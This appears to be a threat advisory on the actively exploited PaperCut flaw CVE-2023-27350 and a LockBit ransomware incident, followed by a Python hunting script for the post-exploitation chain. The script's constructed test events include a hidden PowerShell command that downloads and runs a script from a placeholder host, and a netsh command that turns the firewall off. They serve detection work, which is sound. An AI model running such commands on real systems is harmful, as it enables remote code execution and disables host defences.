

Update: We updated the entry to include information on the discovery of LockBit as the malicious payload and to add Trend Micro Cloud One™ solutions.

Update: We added details on an instance observed through Trend Micro Managed XDR in which we believe the vulnerabilities detailed in this blog were abused by threat actors. We also added Trend Micro Deep Discovery Inspector rules that can help protect against potential exploitation of the vulnerabilities discussed.

Trend Micro's Zero Day Initiative (ZDI) discovered two vulnerabilities, CVE-2023-27350 and CVE-2023-27351, in PaperCut, a print management software solution used by over 100 million users globally. Evidence was found that one of these two vulnerabilities, CVE-2023-27350, is being actively exploited by malicious actors for remote code execution (RCE).

CVE-2023-27350, which affects the PaperCut MF and NG products, was found to have been exploited in the wild (ITW) in the middle of April. This blog entry provides an overview of the vulnerabilities and includes the information that IT and SOC professionals need to know.

The vulnerability is also tracked as ZDI-23-233. The critical-rated CVE-2023-27350 carries a CVSS severity score of 9.8, and it can be abused by an unauthenticated attacker to achieve RCE on an unpatched PaperCut Application Server. Patching the application server is therefore the primary mitigation; the detections discussed below are a complement, not a substitute.

On April 18, 2023, a PaperCut customer reported suspicious activity, which suggested that unpatched servers were being exploited through CVE-2023-27350. Based on PaperCut's investigation, the earliest suspicious activity possibly related to CVE-2023-27350 dates back to April 14, 2023.

Trend Micro Managed XDR observed an instance in which this vulnerability is believed to have been abused by malicious actors. Upon successful exploitation, pc-app.exe (the PaperCut NG/MF application server process) can be used for RCE. In this case, the malicious actors chose to run a PowerShell script via the exploited application. The PowerShell script downloaded and ran a malicious payload and used netsh.exe to circumvent the host firewall. The malicious actors hosted the payload on a temporary file-hosting site that conveniently deletes all uploaded files after 60 minutes, which limits how long the sample remains retrievable from its source. Our analysis indicates that the malicious payload enc.exe is the LockBit ransomware (detected by Trend Micro as ), based on the binary found in the Downloads folder of the user that the malicious actor created.
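The chain above (pc-app.exe launching PowerShell, netsh.exe tampering with the firewall, a payload executed from a user's Downloads folder) is visible in ordinary process-creation telemetry, so a SOC can hunt for it without a vendor signature. The following is an added example, not code from the original entry or from PaperCut or Trend Micro. It uses Sysmon Event ID 1 field names (Computer, UtcTime, ParentImage, Image, CommandLine), but the records are constructed: the install path under Program Files, hostnames, the svc_print user and the example.invalid URL are all placeholders chosen for illustration.

```python
"""Hunt for the PaperCut post-exploitation chain in process-creation telemetry.

Added example with constructed Sysmon-style records; nothing here is taken
from the incident described in the entry except the process names involved.
"""
import ntpath
import re
from collections import defaultdict
from datetime import datetime, timedelta

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# netsh invocations that disable a firewall profile or add a new rule.
FIREWALL_TAMPER = re.compile(
    r"advfirewall\s+(?:set\s+\w+\s+state\s+off|firewall\s+add\s+rule)", re.I)
TIME_FMT = "%Y-%m-%d %H:%M:%S"

# Constructed telemetry (placeholder host names, user, path and URL).
# Rows 1-3 mimic the chain on print01; the remaining rows are benign admin
# activity on print02 that a naive rule would misfire on.
SAMPLE_EVENTS = [
    {"UtcTime": "2023-04-18 09:12:01", "Computer": "print01",
     "ParentImage": r"C:\Program Files\PaperCut NG\server\bin\win\pc-app.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object "
                    "Net.WebClient).DownloadString('http://files.example.invalid/x.ps1')\""},
    {"UtcTime": "2023-04-18 09:12:03", "Computer": "print01",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh advfirewall set allprofiles state off"},
    {"UtcTime": "2023-04-18 09:12:05", "Computer": "print01",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Users\svc_print\Downloads\enc.exe",
     "CommandLine": r"C:\Users\svc_print\Downloads\enc.exe"},
    {"UtcTime": "2023-04-18 09:20:00", "Computer": "print02",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Printer"},
    {"UtcTime": "2023-04-18 09:21:00", "Computer": "print02",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh advfirewall show allprofiles"},
]


def _base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return the list of rule tags that match one process-creation event."""
    tags = []
    parent, image = _base(event["ParentImage"]), _base(event["Image"])
    cmd = event.get("CommandLine", "")
    if parent == "pc-app.exe" and image in SHELLS:
        tags.append("papercut_spawned_shell")      # RCE foothold via the app server
    if image == "netsh.exe" and FIREWALL_TAMPER.search(cmd):
        tags.append("netsh_firewall_tamper")      # firewall circumvention step
    if "\\downloads\\" in event["Image"].lower() and image.endswith(".exe"):
        tags.append("exec_from_downloads")        # dropped payload executed
    return tags


def hunt(events, window=timedelta(minutes=10)):
    """Per host, collect matching tags and flag a chain when a PaperCut-spawned
    shell is followed within `window` by firewall tampering or execution from
    a Downloads folder. Returns {host: {"tags": set, "chain": bool}}."""
    by_host = defaultdict(list)
    for event in events:
        tags = classify(event)
        if tags:
            when = datetime.strptime(event["UtcTime"], TIME_FMT)
            by_host[event["Computer"]].append((when, set(tags)))
    findings = {}
    for host, hits in by_host.items():
        hits.sort(key=lambda hit: hit[0])
        shell_times = [t for t, tags in hits if "papercut_spawned_shell" in tags]
        follow_ups = {"netsh_firewall_tamper", "exec_from_downloads"}
        chain = any(timedelta(0) <= t - s <= window
                    for s in shell_times
                    for t, tags in hits if tags & follow_ups)
        findings[host] = {"tags": set().union(*(tags for _, tags in hits)),
                          "chain": chain}
    return findings


if __name__ == "__main__":
    for host, result in hunt(SAMPLE_EVENTS).items():
        print(host, "CHAIN" if result["chain"] else "isolated", sorted(result["tags"]))
```

A single pc-app.exe-to-PowerShell event is already worth triage on a print server, since the application has no ordinary reason to launch a shell; the time-window correlation exists to rank hosts where the full sequence is present above hosts with a lone hit. Because the hosting site used in the incident deletes uploads after an hour, capturing the child process's command line (and, where available, the PowerShell script block log) matters more than chasing the URL afterwards.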
